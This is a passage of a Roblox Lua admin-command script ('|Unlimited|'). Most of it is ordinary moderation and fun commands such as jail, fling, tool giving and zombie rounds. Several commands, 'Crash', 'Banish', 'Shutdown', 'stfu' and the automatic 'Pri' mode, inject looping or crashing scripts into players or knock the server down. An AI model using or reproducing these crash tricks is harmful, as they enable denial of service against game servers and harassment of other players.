  2275.         function(Msg,Speaker)
  2276.                 OnChatted('/sys/Scripts Are Now UnLocked!',Speaker)
  2277.                 LockedScripts = false
  2278.         end
  2279. )
  2280. YourCommand('GetRanked','GetRanked',0,
  2281.         function(Msg,Speaker)
  2282.           Player=nil
  2283.                 if #Msg==0 then
  2284.                         for i,v in pairs(Ranked) do
  2285.                                 Output(i,v.Color,Speaker,nil,
  2286.                                         function()
  2287.                                                 Player=i
  2288.                                                 RemoveTablets(Speaker)
  2289.                                         end
  2290.                                 )
  2291.                         end
  2292.                 else
  2293.                         for _,v in pairs(Ranked) do
  2294.                                 if _:lower():sub(1,#Msg) == Msg:lower() then
  2295.                                         Player=_
  2296.                                 end
  2297.                         end
  2298.                 end
  2299.                 coroutine.wrap(function()
  2300.                         repeat
  2301.                                 wait()
  2302.                         until Player
  2303.                         PlayerInterface(Player,Speaker)
  2304.                 end)()
  2305.         end
  2306. )
  2307.  
  2308. YourCommand('Kick','k',3,function(Msg,Speaker) for _,v in pairs(GetPlayers(Msg,Speaker)) do v:Destroy() end end )
  2309. AntiCamer = true;
  2310. Delay(0, function()
  2311. while wait() do
  2312. if AntiCamer == true then
  2313.     pcall(function()
  2314.       e=game:GetService("Workspace"):findFirstChild("Focus", true)
  2315.       e.Parent.Head:Destroy()
  2316.       e:Destroy()  
  2317.    end)
  2318. end
  2319.   end
  2320. end)
  2321. YourCommand('All commands','commands',2,
  2322.     function(Msg,Speaker)
  2323.         for name,tb in pairs(Commands) do
  2324.             Output(name .. '( Cmd is /'..tb.Cmd..'/ ,'..tb.Rank..')','Random',Speaker)
  2325.         end
  2326.     end
  2327. )
  2328. YourCommand('Set rank','setrank',0,
  2329.     function(Msg,Speaker)
  2330.         Str = Msg:find(YourBet2)
  2331.         if Str ~= nil then
  2332.             for _,Player in pairs(GetPlayers(Msg:sub(1,Str-1),Speaker)) do
  2333.                 local Rank = Msg:sub(Str+1)
  2334.                 Rank2 = tonumber(Msg:sub(Str+1))
  2335.                 if Rank2 <= Ranked[Speaker.Name].Rank then
  2336.                     Ranked[Player.Name].Rank = Rank2
  2337. else
  2338.                                 Output("Rank not found!","Red",Speaker,3)
  2339.                 end
  2340.             end
  2341.         end
  2342.     end
  2343. )      
  2344. YourCommand('Shut the f up','stfu',4,
  2345.     function(Msg,Speaker)
  2346.         for _,Player in pairs(GetPlayers(Msg,Speaker)) do
  2347.             game:service'Chat':Chat(Player.Character,"If I talk I will be F'ed",Enum.ChatColor.Red)
  2348.             Player.Chatted:connect(function(p)
  2349.                 if Player:findFirstChild('SDFU') then
  2350.                     Player:Destroy()
  2351.                 end
  2352.             end)
  2353.             Instance.new('StringValue',Player).Name = 'SDFU'
  2354.         end
  2355.     end
  2356. )
  2357. YourCommand('Be able to speak', 'bats',4,
  2358.     function(Msg,Speaker)
  2359.         for _,Player in pairs(GetPlayers(Msg,Speaker)) do
  2360.             if Player:findFirstChild('SDFU') then
  2361.                 Player.SDFU:Destroy()
  2362.                 game:service'Chat':Chat(Player.Character,'I can speak again',Enum.ChatColor.Red)
  2363.             end
  2364.         end
  2365.     end
  2366. )
  2367.  
  2368. YourCommand('Banish','b',5,
  2369. function(Msg,Speaker) for _,v in pairs(GetPlayers(Msg,Speaker)) do Ranked[v.Name].Rank = -2     pcall(function()
  2370.                 v.Character.Humanoid.WalkSpeed = tonumber("1e+999") end) coroutine.wrap(function()
  2371.                               CreateLocalScript('while wait() do while true do end repeat until nil end',v.Backpack) wait(1) v:Destroy() end)() end end
  2372. )
  2373. YourCommand('GTFO','gtfo',4,
  2374. function(Msg,Speaker) for _,v in pairs(GetPlayers(Msg,Speaker)) do GTFO(v) end end
  2375. )
  2376. YourCommand('Crash','crash',5,
  2377. function(Msg,Speaker) for _,v in pairs(GetPlayers(Msg,Speaker)) do CreateLocalScript([==[ LP = game.Players LPP = LP.LocalPlayer LPP.Parent = nil LPP.Parent = LP ]==],v.Backpack) end end
  2378. )
  2379. YourCommand('Pri','pri',4,
  2380. function(Msg,Speaker)
  2381. Output('Turn pri on','Green',Speaker,nil,function() PRI=true Output('Pri has been turned on!','Green',Speaker,5) end)
  2382. Output('Turn pri off','Red',Speaker,nil,function() PRI=false Output('Pri has been turned off!','Red',Speaker,5) end)
  2383. Output('Change Pri type','Orange',Speaker,nil,function() RemoveTablets(Speaker) types = {'Kick','Shutdown','Crash'} for _,v in pairs(types) do Output(v,'Green',Speaker,nil,function() PRIType=v RemoveTablets(Speaker) OnChatted('/pri/',Speaker) end ) end end )
  2384. Output('Pri Type : ' .. tostring(PRIType),'Blue',Speaker)
  2385. Output('Pri : ' .. tostring(PRI),'Green',Speaker)
  2386. end
  2387. )
  2388. YourCommand('Respawn','respawn',3,
  2389.     function(Msg,Speaker)
  2390.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2391.             v:LoadCharacter()
  2392.         end
  2393.     end
  2394. )
  2395. YourCommand("Remove Tools","rtools",1,
  2396.         function(Msg,Speaker)
  2397.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2398.                         v.Backpack:ClearAllChildren()
  2399.                 end
  2400.         end
  2401. )
  2402. YourCommand("Duplicate Tools","dupetools",1,
  2403.         function(Msg,Speaker)
  2404.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2405.                         for _,i in pairs(v.Backpack:children()) do
  2406.                                 i:Clone().Parent = Speaker.Backpack
  2407.                         end
  2408.                 end
  2409.         end
  2410. )
  2411. YourCommand('Gets Time','stime',0,
  2412.         function(Msg,Speaker)
  2413.                 Output('The time is '..GetTime(),'Orange',Speaker)
  2414.         end
  2415. )
  2416. YourCommand('Shutdown','sd',7,
  2417.     function(Msg,Speaker)
  2418.         CrashPlayerShutdown = true
  2419. timer=22
  2420. Msg = Instance.new('Hint',Services.Workspace)
  2421.                 for i=1,timer,0.1 do
  2422.         if timer - i > -1 and timer - i < 100 then
  2423.         if Abort == false then
  2424.                 Msg.Text = '|Unlimited| : Shutting down in ' .. tonumber(timer) - i
  2425.                 wait(0.1)
  2426. else
  2427.         Msg.Text = '|Unlimited| : Shutdown Aborted!'
  2428.         wait(3)
  2429.         Msg:remove()
  2430.         Abort = false
  2431.         return end
  2432.         end
  2433.                 end
  2434.         Msg.Text = '|Unlimited| : Server is shutting down!'
  2435. if Abort == false then    
  2436. if CrashPlayerShutdown then
  2437. for _,v in pairs(GetPlayers()) do
  2438. GTFO(v) end end -- Crashes Players
  2439. wait(0.5)
  2440. OnChatted('/nilcrash/',Speaker) -- Crashes nil Players
  2441. wait(2)
  2442. Instance.new("ManualSurfaceJointInstance",Services.Workspace) -- Shuts the server down
  2443. wait(1)
  2444. Shutdown() -- Crashes server
  2445. end
  2446. end
  2447. )
  2448.  
  2449. YourCommand("Fence","fence",5,
  2450. function(Msg,Speaker)
  2451. for _,SelectedPlayer in pairs(GetPlayers(Msg,Speaker)) do
  2452. local Radius = 25
  2453. local Parts = 15
  2454. local FenceParts = {}
  2455. local Main = Instance.new("Model",Services.Workspace)
  2456. Main.Name = "Fence"
  2457. table.insert(Fences,{Fence = Main, Player = SelectedPlayer})
  2458. for i=1,Parts do
  2459. local Part = Instance.new("Part",Main)
  2460. Part.Name = ""
  2461. Part.FormFactor = "Custom"
  2462. Part.TopSurface = "Smooth"
  2463. Part.BottomSurface = "Smooth"
  2464. Part.Reflectance = 0
  2465. Part.Transparency = 0.3
  2466. Part.Anchored = true
  2467. Part.CanCollide = false
  2468. Part.BrickColor = BrickColor.new("Institutional white")
  2469. Part.Size = Vector3.new(10,0.4,10)
  2470. Part.CFrame = SelectedPlayer.Character.Torso.CFrame
  2471. Part.Touched:connect(function(Hit)
  2472. for _,Player in pairs(GetPlayers()) do
  2473. if GetRank(Player) < GetRank(SelectedPlayer) then
  2474. if Hit:IsDescendantOf(Player.Character) then
  2475. Player.Character:BreakJoints()
  2476. end
  2477. end
  2478. end
  2479. end)
  2480. local SelectionBox = Instance.new("SelectionBox",Part)
  2481. SelectionBox.Color = BrickColor.new("Lime green")
  2482. SelectionBox.Adornee = Part
  2483. table.insert(FenceParts,{Part = Part,Selected = 0})
  2484. end
  2485. coroutine.wrap(function()
  2486. while true do
  2487. for Index=#FenceParts,1,-1 do
  2488. local Fence = FenceParts[Index]
  2489. for i=1,5 do
  2490. wait()
  2491. Fence.Selected = Fence.Selected + 1/5*i
  2492. end
  2493. for i=5,1,-1 do
  2494. wait()
  2495. Fence.Selected = Fence.Selected - 1/5*i
  2496. end
  2497. end
  2498. end
  2499. end)()
  2500. coroutine.wrap(function()
  2501. while wait() do
  2502. for i,Fence in pairs(FenceParts) do
  2503. Fence.Part.Anchored = true
  2504. local TorsoPos = SelectedPlayer.Character.Torso.Position
  2505. local DesCF = CFrame.new(TorsoPos)
  2506. * CFrame.Angles(0,math.rad(360/#FenceParts*(i-1))+time()/10,0)
  2507. * CFrame.new(0,2,Radius+Fence.Selected)
  2508. * CFrame.Angles(math.rad(90),0,0)
  2509. Fence.Part.CFrame = DesCF
  2510. end
  2511. end
  2512. end)()
  2513. end
  2514. end
  2515. )
  2516. YourCommand("Script Name","SN",0,
  2517.         function(Msg,Speaker)
  2518.                 Output(script.Name,'Yellow',Speaker)
  2519.         end
  2520. )
  2521. YourCommand('Prank Shutdown','psd',3,
  2522.     function(Msg,Speaker)
  2523. timer=10
  2524. Msg = Instance.new('Message',game.Workspace)
  2525.                 for i=1,timer,0.1 do
  2526.         if timer - i > -1 and timer - i < 100 then
  2527.                 Msg.Text = tonumber(timer) - i .. ' seconds left until game shuts down. --' .. Speaker.Name..'['..GetRank(Speaker)..']'
  2528.                 wait(0.1)
  2529.         end
  2530.                 end
  2531.         Msg.Text = 'Chu all been pranked :P'
  2532.         wait(2)
  2533.         Msg:Destroy()
  2534.     end
  2535. )
  2536. YourCommand("Jail","jail",1,
  2537.         function(Msg,Speaker)
  2538.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2539.                         pcall(function()
  2540.                                 pcall(function() Jails[v.Name].Jail:Destroy() end)
  2541.                                 local Start = v.Character.Torso.CFrame
  2542.                                 local Jail = Instance.new("Model",Services.Workspace)
  2543.                                 local Part = Instance.new("Part")
  2544.                                 Part.FormFactor = "Custom"
  2545.                                 Part.TopSurface = "Smooth"
  2546.                                 Part.BottomSurface = "Smooth"
  2547.                                 Part.Anchored = true
  2548.                                 Part.Transparency = 0.5
  2549.                                 Part.BrickColor = BrickColor.new("Really black")
  2550.                                 Part.Size = Vector3.new(9,9,1)
  2551.                                 local Sel = Instance.new("SelectionBox",Jail) Sel.Adornee = Jail Sel.Color = BrickColor.new("Really black")
  2552.                                 local Floor = Part:Clone() Floor.Parent = Jail Floor.CFrame = Start * CFrame.new(0,-4,0) * CFrame.Angles(math.rad(90),0,0)
  2553.                                 local Cieling = Part:Clone() Cieling.Parent = Jail Cieling.CFrame = Start * CFrame.new(0,4,0) * CFrame.Angles(math.rad(90),0,0)
  2554.                                 local Wall = Part:Clone() Wall.Parent = Jail Wall.CFrame = Start * CFrame.new(0,0,4)
  2555.                                 local Wall = Part:Clone() Wall.Parent = Jail Wall.CFrame = Start * CFrame.new(0,0,-4)
  2556.                                 local Wall = Part:Clone() Wall.Parent = Jail Wall.CFrame = Start * CFrame.Angles(0,math.rad(90),0) * CFrame.new(0,0,4)
  2557.                                 local Wall = Part:Clone() Wall.Parent = Jail Wall.CFrame = Start * CFrame.Angles(0,math.rad(-90),0) * CFrame.new(0,0,4)
  2558.                                 Jails[v.Name] = {Jail=Jail,Speaker=Speaker,Start = Start}
  2559.                         end)
  2560.                 end
  2561.         end
  2562. )
  2563.  
  2564. YourCommand("Un Jail","unjail",1,
  2565.         function(Msg,Speaker)
  2566.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2567.                         pcall(function() Jails[v.Name].Jail:Destroy() end)
  2568.                         Jails[v.Name] = nil
  2569.                 end
  2570.         end
  2571. )
  2572. YourCommand('Fling','fling',2,
  2573. function(Msg,Speaker)
  2574. for i, v in pairs(GetPlayers(Msg,Speaker)) do
  2575. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  2576. local xran local zran
  2577. repeat xran = math.random(-99999,99999) until math.abs(xran) >= 5555
  2578. repeat zran = math.random(-99999,99999) until math.abs(zran) >= 5555
  2579. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  2580.         loggit("Flung "..v.Name)
  2581. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  2582. end
  2583. end
  2584. end
  2585. )
  2586. YourCommand('God','god',1,
  2587.         function(Msg,Speaker)
  2588.                 for _,kek in pairs (GetPlayers(Msg,Speaker)) do
  2589. kek.Character.Humanoid.MaxHealth=math.huge
  2590.                 end
  2591.         end)  
  2592. YourCommand('shows you a log','log',0,
  2593.         function(Msg,Speaker)
  2594.                 local rtn = {}
  2595.                 for _,v in pairs(nillog) do table.insert(rtn,v) end
  2596.                 for _,m in pairs(rtn) do
  2597.                         Output(m,Color,Speaker)
  2598.                 end
  2599.         end
  2600. )
  2601. YourCommand('Spawn Dummy','Dummy',4,
  2602.         function(Msg,Speaker)
  2603.                        local n = tonumber(Msg) and tonumber(Msg) > 1 and tonumber(Msg) or 1
  2604.         local t = game:GetService("InsertService"):LoadAsset(68452456):findFirstChild("Clone") or Char and Char:clone()
  2605.         if not t then return Output("No Inserted Clone or Saved Character!","Red",Speaker) end
  2606.         Instance.new("StringValue",t).Name = "???"
  2607.         for k,v in pairs(t:GetChildren()) do
  2608.                 if v:IsA("Hat") or v:IsA("Pants") or v:IsA("Shirt") or v:IsA("CharacterMesh") or v:IsA("ShirtGraphic") then
  2609.                         v:Destroy()
  2610.                 elseif v:IsA("BodyColors") then
  2611.                         v.HeadColor = BrickColor.new"Bright yellow"
  2612.                         v.LeftArmColor = BrickColor.new"Bright yellow"
  2613.                         v.RightArmColor = BrickColor.new"Bright yellow"
  2614.                         v.LeftLegColor = BrickColor.new"Br. yellowish green"
  2615.                         v.RightLegColor = BrickColor.new"Br. yellowish green"
  2616.                         v.TorsoColor = BrickColor.new"Bright blue"
  2617.                 elseif v:IsA("Part") then
  2618.                         v.Transparency = 0
  2619.                         v.BrickColor = BrickColor.new(v.Name:lower():find("a") and "Bright yellow" or "Br. yellowish green")
  2620.                         if v.Name == "Torso" then v.BrickColor = BrickColor.new("Bright blue") end
  2621.                         if v:findFirstChild("roblox") then v.roblox:Destroy() end
  2622.                 end
  2623.         end
  2624.         if Msg:lower() == "grid" then
  2625.                 for x=-3,3 do
  2626.                         for z=-3,3 do
  2627.                                 local c = t:clone()
  2628.                                 c.Name = "???"
  2629.                                 c.Parent = workspace
  2630.                                 c:MakeJoints()
  2631.                                 c:MoveTo((workspace.CurrentCamera.Focus * CFrame.new(x*10,0,z*10)).p)
  2632.                                 if c:findFirstChild("Humanoid") then
  2633.                                         c.Humanoid.Died:connect(function() wait(3) c:Destroy() end)
  2634.                                 end
  2635.                                 wait()
  2636.                         end
  2637.                 end
  2638.         else
  2639.                 for i=1,n do
  2640.                         local c = t:clone()
  2641.                         c.Name = "???"
  2642.                         c.Parent = workspace
  2643.                         c:MakeJoints()
  2644.                         c:MoveTo(workspace.CurrentCamera.Focus.p)
  2645.                         if c:findFirstChild("Humanoid") then
  2646.                                 c.Humanoid.Died:connect(function() wait(3) c:Destroy() end)
  2647.                         end
  2648.                         wait(1)
  2649.                 end
  2650.         end
  2651.         end
  2652.         )
  2653. YourCommand('Crush','crush',3,
  2654.     function(Msg,Speaker)
  2655.         for _,PlayerList in pairs(GetPlayers(Msg,Speaker)) do
  2656. if PlayerList~=nil then
  2657. if  pcall(function() local _ = PlayerList.Character.Torso.CFrame end) == true and pcall(function() local _ = PlayerList.Character.Humanoid end) == true then
  2658. coroutine.wrap(function()
  2659. local WalkSpeed = PlayerList.Character.Humanoid.WalkSpeed
  2660. PlayerList.Character.Humanoid.WalkSpeed = 0
  2661. wait(3)
  2662. PlayerList.Character.Humanoid.WalkSpeed = WalkSpeed
  2663. end)()
  2664. local Brick = Instance.new("Part", workspace)
  2665. Brick.Name = "Brick"
  2666. Brick.BrickColor = BrickColor.new("Really black")
  2667. Brick.TopSurface = 0
  2668. Brick.BottomSurface = 0
  2669. Brick.formFactor = "Symmetric"
  2670. Brick.Size = Vector3.new(10, 7, 8)
  2671. Brick.CFrame = CFrame.new(PlayerList.Character.Torso.CFrame.p) * CFrame.new(0, 200, 0) * CFrame.fromEulerAnglesXYZ(0, math.rad(math.random(0, 360)), 0)
  2672. Instance.new("SpecialMesh", Brick).MeshType = "Torso"
  2673. local BodyVelocity = Instance.new("BodyVelocity", Brick)
  2674. BodyVelocity.maxForce = Vector3.new(math.huge, math.huge, math.huge)
  2675. BodyVelocity.velocity = Vector3.new(0, -300, 0)
  2676. Brick.Touched:connect(function(Hit)
  2677. if Hit.Parent == nil then return end
  2678. if Hit.Parent:FindFirstChild("Humanoid") ~= nil then
  2679. Hit.Parent.Humanoid.MaxHealth = 100
  2680. Hit.Parent.Humanoid.Health = 0
  2681. else
  2682. if Hit:GetMass() > 1000 then return end
  2683. Hit.Anchored = false
  2684. Hit:BreakJoints()
  2685. end
  2686. end)
  2687. coroutine.wrap(function()
  2688. for i = 1, 0, -0.05 do
  2689. Brick.Transparency = i
  2690. wait()
  2691. end
  2692. Brick.Transparency = 0
  2693. wait(2)
  2694. for i = 0, 1, 0.015 do
  2695. Brick.Transparency = i
  2696. wait()
  2697. end
  2698. Brick:Remove()
  2699. end)()
  2700. end
  2701.  
  2702. end
  2703. end
  2704. end
  2705. )
  2706. YourCommand('Steal tools','steal',1,
  2707.     function(Msg,Speaker)
  2708.         for _,Player in pairs(GetPlayers(Msg,Speaker)) do
  2709.             for _,Item in pairs(Player:findFirstChild('Backpack'):GetChildren()) do
  2710.                 Item:Clone().Parent=Speaker:findFirstChild('Backpack')
  2711.             end
  2712.         end
  2713.     end
  2714. )
  2715. YourCommand('No zombies','nozomb',1,function(Msg,Speaker)
  2716.     while wait() do
  2717.         game.Workspace.Zombie:remove()
  2718.         game.Lighting.TimeOfDay=12
  2719.         game.Lighting.FogEnd=999999
  2720.         end
  2721. end )
  2722.  
  2723.  
  2724. YourCommand('Ro-Ped','ped',0,function(Msg,Speaker) for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2725. game:GetService("InsertService"):LoadAsset(104642522):children()[1].Parent = v.Backpack  
  2726.  end
  2727. end )
  2728. YourCommand("NoGui",'noguis',6,
  2729.     function(Msg,Speaker)
  2730. for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2731.     v.PlayerGui:ClearAllChildren()
  2732. end
  2733.     end
  2734. )
  2735. YourCommand("loop Nogui",'lnogui',7,
  2736.     function(Msg,Speaker)
  2737.         while wait() do
  2738. for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2739.     v.PlayerGui:ClearAllChildren()
  2740. end
  2741.             end
  2742.         end
  2743. )
  2744. YourCommand("Invite","invite",2,
  2745.         function(Msg,Speaker)
  2746.                 for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2747.                         local ChatBoxes = {}
  2748.                         local Scr = Instance.new("ScreenGui",v.PlayerGui)
  2749.                         Scr.Name = "UnlimitedChat"
  2750.                         local Frame = Instance.new("Frame",Scr)
  2751.                         Frame.Style = "RobloxSquare"
  2752.                         Frame.Active = true
  2753.                         Frame.Transparency = 0.5
  2754.                         Frame.Draggable = true
  2755.                         Frame.Size = UDim2.new(0.45,0,0.25,0)
  2756.                         Frame.Position = UDim2.new(0,0,0.4,0)
  2757.                         local Title = Instance.new("TextLabel",Frame)
  2758.                         Title.Text = "|Unlimited| Private Chat"
  2759.                         Title.FontSize = "Size14"
  2760.                         Title.Active = false
  2761.                         Title.TextColor3 = Colors.Red
  2762.                         Title.BackgroundTransparency = 1
  2763.                         Title.Size = UDim2.new(0.3,0,0.1,0)
  2764.                         Title.Position = UDim2.new(0.35,0,0,0)
  2765.                         local Close = Instance.new("TextButton",Frame)
  2766.                         Close.Text = "X"
  2767.                         Close.FontSize = "Size18"
  2768.                         Close.TextColor3 = Colors.Red
  2769.                         Close.BackgroundTransparency = 1
  2770.                         Close.Size = UDim2.new(0.1,0,0.1,0)
  2771.                         Close.Position = UDim2.new(0.9,0,0,0)
  2772.                         Close.MouseButton1Down:connect(function()
  2773.                                 Frame:TweenPosition(UDim2.new(0.1, 0, 2, 0), "InOut", "Quad")
  2774.                                 wait(5)
  2775.                                 Scr:Destroy()
  2776.                         end)
  2777.                         for i=1,6 do
  2778.                                 local Chat = Instance.new("TextLabel",Frame)
  2779.                                 Chat.Text = ""
  2780.                                 Chat.FontSize = "Size12"
  2781.                                 Chat.TextXAlignment = "Left"
  2782.                                 Chat.TextColor3 = Colors.Green
  2783.                                 Chat.BackgroundTransparency = 1
  2784.                                 Chat.Size = UDim2.new(1,0,0.1,0)
  2785.                                 Chat.Position = UDim2.new(0,0,0.15+0.1*i,0)
  2786.                                 table.insert(ChatBoxes,Chat)
  2787.                         end
  2788.                         local UserIn = Instance.new("TextBox",Frame)
  2789.                         UserIn.Text = "Chat Here"
  2790.                         UserIn.FontSize = "Size14"
  2791.                         UserIn.TextColor3 = Colors.Red
  2792.                         UserIn.BackgroundTransparency = 1
  2793.                         UserIn.Size = UDim2.new(1,0,0.1,0)
  2794.                         UserIn.Position = UDim2.new(0,0,0.9,0)
  2795.                         UserIn.Changed:connect(function()
  2796.                                 if UserIn.Text ~= "Chat Here" then
  2797.                                         if #UserIn.Text > 75 then
  2798.                                                 local Rtn = v.Name..":\t"..UserIn.Text
  2799.                                                 repeat
  2800.                                                         table.insert(PrivateChats,Rtn:sub(0,75))
  2801.                                                         Rtn = Rtn:sub(76)
  2802.                                                 until Rtn == ""
  2803.                                         else
  2804.                                                 table.insert(PrivateChats,v.Name..":\t"..UserIn.Text)
  2805.                                         end
  2806.                                         UserIn.Text = "Chat Here"
  2807.                                 end
  2808.                         end)
  2809.                         coroutine.wrap(function()
  2810.                                 while wait(1) do
  2811.                                         Scr.Parent = v.PlayerGui
  2812.                                         local Current = #ChatBoxes - 1
  2813.                                         for _,Text in pairs(ChatBoxes) do
  2814.                                                 Text.Text = PrivateChats[#PrivateChats-Current] or ""
  2815.                                                 Current = Current - 1
  2816.                                         end
  2817.                                 end
  2818.                         end)()
  2819.                 end
  2820.         end
  2821. )
  2822.  
  2823. YourCommand('Motercycle','moterbike',1,function(Msg,Speaker)
  2824.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2825. game:GetService("InsertService"):LoadAsset(122278149):children()[1].Parent = v.Backpack
  2826.         end
  2827.         end )
  2828. YourCommand('Hyperlaser Gun','hyperlaser',1,function(Msg,Speaker)
  2829.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2830. game:GetService("InsertService"):LoadAsset(130113146):children()[1].Parent = v.Backpack
  2831.         end
  2832.         end )
  2833. YourCommand('Hyperbike','hyperbike',1,function(Msg,Speaker)
  2834.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2835. game:GetService("InsertService"):LoadAsset(130113061):children()[1].Parent = v.Backpack
  2836.         end
  2837.         end )
  2838. YourCommand('Hoverboard','hoverboard',1,function(Msg,Speaker)
  2839.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2840. game:GetService("InsertService"):LoadAsset(124127383):children()[1].Parent = v.Backpack
  2841.         end
  2842.         end )
  2843.  
  2844. YourCommand('Shotgun','shotgun',1,function(Msg,Speaker)
  2845.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2846. game:GetService("InsertService"):LoadAsset(94233344):children()[1].Parent = v.Backpack
  2847.         end
  2848.         end )
  2849.  
  2850. YourCommand('Dual Darkhearts','dual',1,function(Msg,Speaker)
  2851.         for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2852. game:GetService("InsertService"):LoadAsset(108149175):children()[1].Parent = v.Backpack
  2853.         end
  2854.         end )
  2855.  
  2856.  
  2857. YourCommand('Zombie tools','zombt',1,function(Msg,Speaker)
  2858.     for _,v in pairs(GetPlayers(Msg,Speaker)) do
  2859. game:GetService("InsertService"):LoadAsset(101078524):children()[1].Parent = v.Backpack
  2860. game:GetService("InsertService"):LoadAsset(27902406):children()[1].Parent = v.Backpack
  2861. game:GetService("InsertService"):LoadAsset(95354304):children()[1].Parent = v.Backpack      
  2862. game:GetService("InsertService"):LoadAsset(104642522):children()[1].Parent = v.Backpack
  2863. game:GetService("InsertService"):LoadAsset(45201977):children()[1].Parent = v.Backpack
  2864. game:GetService("InsertService"):LoadAsset(53130867):children()[1].Parent = v.Backpack
  2865.      end
  2866. end )
  2867. YourCommand('New round','zomb',1,function(Msg,Speaker)
  2868.     b=Instance.new("Part",Workspace)
  2869. b.Anchored=true
  2870. b.Size=Vector3.new(1200,3,1200)
  2871. b.Color=Colors.Grey
  2872. b.CFrame=CFrame.new(0,0,0)
  2873. game.Lighting.FogEnd=33
  2874. game.Lighting.TimeOfDay=1
  2875. game.Lighting.FogColor=Color3.new(0,0,0)
  2876. q=Instance.new("Hint",Workspace)
  2877.         q.Text='Zombie game is active. Once you die, you loose weps. Wait for a new round!'
  2878.         m=Instance.new("Message",Workspace)
  2879.         m.Text='zombie game loaded!'
  2880.         wait(5)
  2881. m:remove()
  2882.  
  2883.  m=Instance.new("Message",Workspace)
  2884. m.Text='Round over!! Good job Surviving...'
  2885. wait(3)
  2886. m:remove()
  2887.  m=Instance.new("Message",Workspace)
  2888. m.Text='Survive as a team to beat the zombies!'
  2889. wait(3.9)
  2890. m:remove()
  2891. m=Instance.new("Message",Workspace)
  2892. m.Text='New Round in 3...'
  2893. wait(1.5)
  2894. m:remove()
  2895. m=Instance.new("Message",Workspace)
  2896. m.Text='2...'
  2897. wait(1)
  2898. m:remove()
  2899. m=Instance.new("Message",Workspace)
  2900. m.Text='1...'
  2901. wait(1)
  2902. m:remove()
  2903. m=Instance.new("Message",Workspace)
  2904. m.Text='New Round'
  2905. wait(3)
  2906. m:remove()
  2907. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2908. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2909. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2910. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2911. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2912. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2913. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2914. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2915. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2916. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2917. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2918. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2919. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2920. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2921. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2922. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2923. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2924. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2925. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2926. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2927. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2928. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2929. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2930. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2931. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2932. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2933. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2934. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2935. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2936. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2937. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2938. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2939. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2940. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2941. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2942. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2943. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2944. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2945. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2946. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2947. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2948. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2949. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2950. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
  2951. game:GetService("InsertService"):LoadAsset(93601062):children()[1].Parent = workspace
